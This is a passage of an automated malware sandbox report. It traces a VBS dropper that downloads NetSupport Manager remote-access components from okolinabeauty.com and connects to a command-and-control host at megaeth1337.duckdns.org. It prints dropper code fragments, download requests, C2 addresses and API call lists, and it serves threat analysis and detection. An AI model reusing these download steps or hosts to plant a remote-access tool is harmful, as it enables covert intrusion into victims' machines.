                                Source: Binary string: msvcr100.i386.pdb source: client32.exe, 00000020.00000002.115187020346.000000006CA21000.00000020.00000001.01000000.00000019.sdmp, client32.exe, 00000021.00000002.115187219936.000000006CA21000.00000020.00000001.01000000.00000019.sdmp, pcicfgui_client.exe, 00000022.00000002.114306116329.000000006CA21000.00000020.00000001.01000000.00000019.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\ctl32\release_unicode\pcichek.pdb source: client32.exe, 00000020.00000002.115191428864.00000000701B2000.00000002.00000001.01000000.0000001A.sdmp, client32.exe, 00000021.00000002.115191432453.00000000701B2000.00000002.00000001.01000000.0000001A.sdmp, pcicfgui_client.exe, 00000022.00000002.114307056768.00000000701B2000.00000002.00000001.01000000.0000001A.sdmp
                                Source: Binary string: C:\CodeBases\isdev\redist\Language Independent\i386\DllWrap.pdb source: wscript.exe, 00000006.00000003.114076941291.0000000005F10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B4B6000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: NETSUPPORT LTD.NetSupport Ltd.url.pdb.dllpreprocessing %s source: client32.exe, 00000020.00000002.115187992990.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: DisableGeolocationEnableStopClientpcicl32.pdbSSLDefCertrootcert.pemSSLCertDirRootCertsshareFilecic/setup.msicic/setup.execic/delta.zipCICshareVershareTypeInstalledBytracerecvtracesendNoAckWhenInRoomlimitcolorbitsWinHttpWiredNetworkSpeedWebSocketSSLOnlySSLDisconnectTimeoutSilentImageFilecic_lock_image.jpgImpersonateCurrentUserdetected TS feature source: client32.exe, 00000020.00000002.115187992990.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: powershell.pdbUGP source: Pyyidau.vbs.exe, 00000004.00000000.113910844511.0000000000C51000.00000020.00000001.01000000.00000006.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release\pcihooks.pdb source: client32.exe, 00000021.00000002.115186530049.000000006C61A000.00000002.00000001.01000000.0000001F.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\cryptpak\Release\CryptPak.pdb source: client32.exe, 00000020.00000002.115186693309.000000006C9BE000.00000002.00000001.01000000.0000001B.sdmp, client32.exe, 00000021.00000002.115186891711.000000006C9BE000.00000002.00000001.01000000.0000001B.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410f\client32\release_unicode\PCICL32.pdb source: client32.exe, 00000020.00000002.115187992990.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: powershell.pdb source: Pyyidau.vbs.exe, 00000004.00000000.113910844511.0000000000C51000.00000020.00000001.01000000.00000006.sdmp
                                Source: Binary string: e:\nsmsrc\nsm\1250\1250\kbfiltr\sys\objfre_wnet_amd64\amd64\nskbfltr.pdb source: winst64.exe, 0000001E.00000003.114226626711.00000000010E6000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\ctl32\release_unicode\pcicapi.pdb source: client32.exe, 00000020.00000002.115185842993.000000006C8F5000.00000002.00000001.01000000.0000001D.sdmp
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: z:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: x:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: v:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: t:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: r:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: p:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: n:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: l:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: j:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: h:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: f:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: d:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: b:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: y:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: w:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: u:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: s:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: q:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: o:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: m:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: k:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: i:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: g:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: e:
                                Source: C:\Windows\SysWOW64\cscript.exeFile opened: c:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: a:
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005D80C0 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,ControlService,GetLastError,GetLastError,GetLastError,QueryServiceStatus,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,wsprintfW,wsprintfW,GetComputerNameW,GetCurrentDirectoryW,wsprintfW,FindFirstFileW,GetCurrentDirectoryW,DeleteFileW,FindNextFileW,FindClose,GetCurrentDirectoryW,RemoveDirectoryW,DeleteService,GetLastError,CloseServiceHandle,OpenServiceW,GetLastError,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,GetLastError,CloseServiceHandle,25_2_005D80C0
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005D4AF0 GetSystemDirectoryW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,GetModuleFileNameW,FindFirstFileW,FindClose,CopyFileW,25_2_005D4AF0
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005C0C40 FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,25_2_005C0C40
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005D55D0 FindFirstFileW,FindClose,25_2_005D55D0
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005BFD80 FindFirstFileW,CompareFileTime,FindClose,CreateDirectoryW,MoveFileW,GetLastError,CopyFileW,MoveFileW,GetLastError,25_2_005BFD80
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005DBE60 wsprintfW,GetPrivateProfileIntW,LoadStringW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,GetSystemDirectoryW,25_2_005DBE60
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005BFE18 FindFirstFileW,CompareFileTime,FindClose,CreateDirectoryW,MoveFileW,25_2_005BFE18
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_009180C0 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,ControlService,GetLastError,GetLastError,GetLastError,QueryServiceStatus,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,wsprintfW,wsprintfW,GetComputerNameW,GetCurrentDirectoryW,wsprintfW,FindFirstFileW,GetCurrentDirectoryW,DeleteFileW,FindNextFileW,FindClose,GetCurrentDirectoryW,RemoveDirectoryW,DeleteService,GetLastError,CloseServiceHandle,OpenServiceW,GetLastError,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,GetLastError,CloseServiceHandle,27_2_009180C0
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_00914AF0 GetSystemDirectoryW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,GetModuleFileNameW,FindFirstFileW,FindClose,CopyFileW,27_2_00914AF0
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_00900C40 FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,27_2_00900C40
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_009155D0 FindFirstFileW,FindClose,27_2_009155D0
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_008FFD80 FindFirstFileW,CompareFileTime,FindClose,CreateDirectoryW,MoveFileW,GetLastError,CopyFileW,MoveFileW,GetLastError,27_2_008FFD80
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_008FFE18 FindFirstFileW,CompareFileTime,FindClose,CreateDirectoryW,MoveFileW,27_2_008FFE18
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0091BE60 wsprintfW,GetPrivateProfileIntW,LoadStringW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,GetSystemDirectoryW,27_2_0091BE60
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FD0C40 FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,29_2_00FD0C40
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FE80C0 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,ControlService,GetLastError,GetLastError,GetLastError,QueryServiceStatus,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,wsprintfW,wsprintfW,GetComputerNameW,GetCurrentDirectoryW,wsprintfW,FindFirstFileW,GetCurrentDirectoryW,DeleteFileW,FindNextFileW,FindClose,GetCurrentDirectoryW,RemoveDirectoryW,DeleteService,GetLastError,CloseServiceHandle,OpenServiceW,GetLastError,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,GetLastError,CloseServiceHandle,29_2_00FE80C0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FE4AF0 GetSystemDirectoryW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,GetModuleFileNameW,FindFirstFileW,FindClose,CopyFileW,29_2_00FE4AF0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FE55D0 FindFirstFileW,FindClose,29_2_00FE55D0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FCFD80 FindFirstFileW,CompareFileTime,FindClose,CreateDirectoryW,MoveFileW,GetLastError,CopyFileW,MoveFileW,GetLastError,29_2_00FCFD80
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FEBE60 wsprintfW,GetPrivateProfileIntW,LoadStringW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,GetSystemDirectoryW,29_2_00FEBE60
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FCFE18 FindFirstFileW,CompareFileTime,FindClose,CreateDirectoryW,MoveFileW,29_2_00FCFE18
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming

                                Software Vulnerabilities

                                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

                                Networking

                                Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 176.126.113.166 443
                                Source: C:\Windows\Installer\MSI1387.tmpRegistry value created: NULL Service
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeDropped file: binaryStream.Write xmlHttp.responseBody
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeDropped file: binaryStream.SaveToFile nsmFile, 2
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeDropped file: binaryStream.Write xmlHttp.responseBody
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeDropped file: binaryStream.SaveToFile clientFile, 2
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeDropped file: binaryStream.Write xmlHttp.responseBody
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeDropped file: binaryStream.SaveToFile targetFile, 2
                                Source: unknownDNS query: name: megaeth1337.duckdns.org
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49748
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49750
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49751
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49752
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49753
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49754
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49755
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49756
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49757
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49758
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49759
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49760
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49761
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49762
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49763
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49764
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49765
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49766
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49767
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49768
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49769
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49770
                                Source: global trafficTCP traffic: 192.168.11.20:49748 -> 185.170.144.66:1773
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 104.26.1.231 104.26.1.231
                                Source: Joe Sandbox ViewASN Name: SAARGATE-ASVSENETGmbHDE SAARGATE-ASVSENETGmbHDE
                                Source: Joe Sandbox ViewASN Name: VDWELLEREE VDWELLEREE
                                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                Source: global trafficHTTP traffic detected: GET /choh/NSM.lic HTTP/1.1Accept: */*Accept-Language: en-US,en-GB;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: okolinabeauty.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /choh/Client32.ini HTTP/1.1Accept: */*Accept-Language: en-US,en-GB;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: okolinabeauty.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /choh/vrep.msi HTTP/1.1Accept: */*Accept-Language: en-US,en-GB;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: okolinabeauty.comConnection: Keep-Alive
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: UpgradeUpgrade: websocketUser-Agent: NetSupport Manager/1.3Sec-WebSocket-Key: tRPuzWtXaHbQaT2zVo4LtA==Sec-WebSocket-Version: 13Host: megaeth1337.duckdns.org:1773
                                Source: global trafficDNS traffic detected: DNS query: okolinabeauty.com
                                Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: global trafficDNS traffic detected: DNS query: megaeth1337.duckdns.org
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 23 Nov 2024 01:54:13 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8e6d87b08eea72b9-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3mH28tc1SOOFomBZWoZLUKlnqr2uLJYLYnYiLsazuB95cS6p5gv8%2B54erWrIw15OSIpIC7953yea4PwoDT2Ly9ZsQ%2FaYsIjUEE8m06qiaeJ5f6O6BGu%2BIclbhZwsSbWZ6PHe7AMPt3CnCEBF"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=95240&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 23 Nov 2024 01:54:13 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8e6d87b348338c9b-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ToH%2F6ReBX3KuwJRZCp2hXYx22vJxmqboG4uzh2cjDZPB1tRZKDItf5NVAvt6cO%2F2avq8kYCmW9UVvY2TjqchP5VIrSk92cjIHMGwr%2BBUY5%2BoH2CcwY79YOiSs63odFhmuyHQTiO9BFXGXAl0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=94796&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 23 Nov 2024 01:54:14 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8e6d87b5d99a0f81-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tOS5fJQ5PrEyHP%2BsaKXZpwDr5%2F13GoXC7jk8Co51P7CSFExPrBNpuBaWwKXjtu6rEkJMmLBfKBQse0xowQbgJU1gAnyzuHjLB8ekYoOhsaRWOlBuVWOvt2gTPm2FT1dRbQpPXTYE2kL0bvyD"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=94587&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                                Source: pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: http://%s/favicon.icoshcore.dllGetDpiForMonitorPCI
                                Source: client32.exe, 00000020.00000002.115185392651.000000006C888000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: http://%s/gateway.htm
                                Source: client32.exe, 00000020.00000002.115185392651.000000006C888000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: http://%s/testpage.htmwininet.dll%s:%sCredUIPromptForCredentialsWcredui.dll
                                Source: client32.exe, 00000020.00000002.115187992990.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmpString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: pcicfgui_client.exe, 00000022.00000002.114293124962.000000006C372000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: http://62.172.138.12/url_redirect.htm#The
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048234996.0000000005BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048234996.0000000005BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048234996.0000000005BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113948697299.00000000031ED000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.115184199438.00000000033DF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115021399670.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114973594833.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115009289331.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114997111170.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115033607252.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000026.00000002.114307415040.0000000002C73000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000026.00000003.114303592438.0000000002C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                                Source: wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B462000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226577773.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114283016484.00000000038A6000.00000002.00000001.00040000.00000023.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B462000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226577773.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114283016484.00000000038A6000.00000002.00000001.00040000.00000023.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
